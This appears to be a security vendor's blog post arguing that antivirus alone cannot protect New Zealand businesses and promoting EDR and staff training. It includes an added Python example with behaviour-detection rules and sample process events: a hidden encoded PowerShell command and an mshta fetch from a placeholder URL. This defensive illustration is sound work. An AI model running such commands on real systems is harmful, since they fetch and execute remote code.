Why antivirus alone is not enough to protect your business
It’s no secret that the rate of cyberattacks targeting New Zealand businesses is growing. CERT NZ responded to 2,072 incidents during the third quarter of 2021 alone - a 53% increase on the previous quarter. The most concerning trend, though, is the complacency around device protection. Many business owners think that traditional antivirus (AV) software will be enough to keep their PCs, laptops, and mobile devices secure from malicious behaviour, but the reality couldn’t be further from the truth.
Malicious software has grown more advanced to the point where you don’t even need to click on a malicious link to be at risk, and new and modified versions of these threats that can bypass AV detection are being released every day. Forward-thinking businesses are realising that more preventative measures are needed to keep themselves, their data, and staff safe.
Traditional antivirus alone cannot keep your business secure
Antivirus software is fantastic at identifying and quarantining known threats before they can cause harm, but this reactive protection is simply inadequate on its own. The protection afforded by AV programs is only as good as their signature database. Malware and similar threats are growing more advanced and more persistent, and new and modified versions are released daily. If your organisation relies solely on antivirus software to protect its devices, then it will always be behind the curve in shielding itself from emerging threats and detecting potential breaches. In fact, Verizon’s 2021 Data Breach Investigations Report highlighted that a third of breaches take months or longer to be detected, and the longer a breach goes undetected, the more damage can be done.
That same report also highlighted that 85% of security incidents in 2021 had a human element. Antivirus software relies on alert-based responses and will notify your users when a detection has been made. If your user accidentally ignores an antivirus notification or moves an infected file from quarantine, that device and your network could subsequently become compromised. There is also the possibility that false-positive AV notifications could waste your IT security team's time and resources.
Finally, traditional antivirus has the significant drawback of being focused on finding threats via infected files and applications. It does not offer protection and detection for more advanced threats, such as actors gaining access to your devices via methods that do not use compromised files or applications. Without code, your antivirus has nothing to scan and the breach will likely go undetected until damage has already been caused.
How Endpoint Detection & Response Technology Provides Proactive Device Protection
Antivirus software is an important aspect of your business’s security, but its reactive approach to endpoint protection means it shouldn’t be your only tool. Protecting endpoint devices such as PCs, laptops, and mobile devices requires more advanced technology and support than AV software can provide alone. Endpoint detection and response (EDR) software is the next evolutionary step for device protection: it leverages intelligent analysis and machine learning to detect endpoint anomalies that could indicate a breach. For example, in addition to scanning software code, EDR technology proactively looks for unusual or unexpected behaviour from applications that could indicate malicious intent and flags it for further investigation. This proactive approach can lead to earlier detection of new and modified threats because it does not rely solely on a central signature database being updated. It also closes the cyber security gaps that antivirus programmes leave behind, as EDR’s machine learning threat detection can identify device breaches regardless of where they originated, including methods that do not use infected files or applications to gain unauthorised access.
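The contrast above is easy to see in a few lines of code. The example below is added here and is not from the article or from any EDR vendor: a signature check that only matches hashes already in its database, beside a hypothetical behaviour rule set that scores what a process does (an Office application spawning a script host, an encoded command line, a script host reaching out to a URL) with no file to scan at all. The file contents, hashes and process events are constructed sample data.

```python
import hashlib
from dataclasses import dataclass

# Constructed sample data, not from the article: one "known bad" file hash of
# the kind a signature database holds, and a few process events of the kind an
# EDR agent records from an endpoint.
KNOWN_BAD_HASHES = {hashlib.sha256(b"dropper-build-1").hexdigest()}

# Hypothetical behaviour rules: they describe what a process does, not file content.
OFFICE_APPS = {"winword.exe", "excel.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "mshta.exe"}

@dataclass
class ProcessEvent:
    parent: str   # image name of the parent process
    child: str    # image name of the newly started process
    cmdline: str  # command line of the new process

def av_signature_check(file_bytes: bytes) -> bool:
    """Signature-based AV: a file is bad only if its hash is already known."""
    return hashlib.sha256(file_bytes).hexdigest() in KNOWN_BAD_HASHES

def edr_behaviour_findings(events: list) -> list:
    """Behaviour-based detection: flag suspicious process activity, no file needed."""
    findings = []
    for ev in events:
        tokens = ev.cmdline.lower().split()
        reasons = []
        if ev.parent in OFFICE_APPS and ev.child in SCRIPT_HOSTS:
            reasons.append("office-app-spawned-script-host")
        if ev.child in SCRIPT_HOSTS and any(t in ("-enc", "-encodedcommand") for t in tokens):
            reasons.append("encoded-command-line")
        if ev.child in SCRIPT_HOSTS and any(t.startswith("http") for t in tokens):
            reasons.append("script-host-reaching-remote-url")
        if reasons:
            findings.append((ev, reasons))
    return findings

# Constructed telemetry: one benign admin action, then two document-borne chains.
SAMPLE_EVENTS = [
    ProcessEvent("explorer.exe", "powershell.exe", "powershell.exe Get-ChildItem C:\\Reports"),
    ProcessEvent("winword.exe", "powershell.exe", "powershell.exe -w hidden -enc <BASE64-PLACEHOLDER>"),
    ProcessEvent("outlook.exe", "mshta.exe", "mshta.exe http://example.invalid/update.hta"),
]

if __name__ == "__main__":
    # A one-byte change to the dropper defeats the hash lookup; the behaviour rules do not care.
    print(av_signature_check(b"dropper-build-1"), av_signature_check(b"dropper-build-1 "))  # True False
    for ev, reasons in edr_behaviour_findings(SAMPLE_EVENTS):
        print(ev.parent, "->", ev.child, reasons)
```

The benign explorer-launched PowerShell produces no finding, while both document-borne chains are flagged even though neither involves a file whose hash the signature database knows.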
EDR software, such as CrowdStrike’s Falcon, replaces legacy AV software by combining next-generation antivirus protection together with machine learning and integrated threat intelligence feeds that identify potential breaches that will need further investigation by a security response team. To provide complete endpoint protection, our Secure Endpoint Service leverages both CrowdStrike’s EDR technology and our 24x7 security response team to provide world-leading endpoint security to as many New Zealand businesses as possible.
Why training & testing your people on cyber security is just as important
When it comes to cyber protection, ensuring that your business has adequate technology is only half the battle. When a breach occurs, it is likely to have originated from a human being performing an action they shouldn’t have, such as clicking a phishing link, rather than a failure in your technology. Half of the 2,072 incidents reported to CERT NZ during Q3 2021 were due to phishing and credential harvesting. This highlights that educating your staff on how to best avoid these types of targeted attacks is crucial. It is also a good idea to test how prepared your technology and employees are at repelling attacks. Threat Emulation services launch simulated attacks against your business and people to identify weaknesses in your defences to better enable you to adapt and bolster them.
Relying on antivirus alone does not provide enough protection to keep your business secure. Malicious software is becoming more advanced and persistent, and the faster your IT security is able to identify potential breaches, the more secure your business will be. Endpoint detection and response technology provides next-generation antivirus protection, monitors for application behaviour that indicates potential breaches, and feeds this information directly to a security response team for further investigation. Most security incidents have a human element, and half are the result of employees falling victim to phishing and credential harvesting scams, so ensuring your staff are adequately educated on how best to spot and avoid these attacks, and frequently testing this knowledge, is key to preventing breaches from occurring in the first place.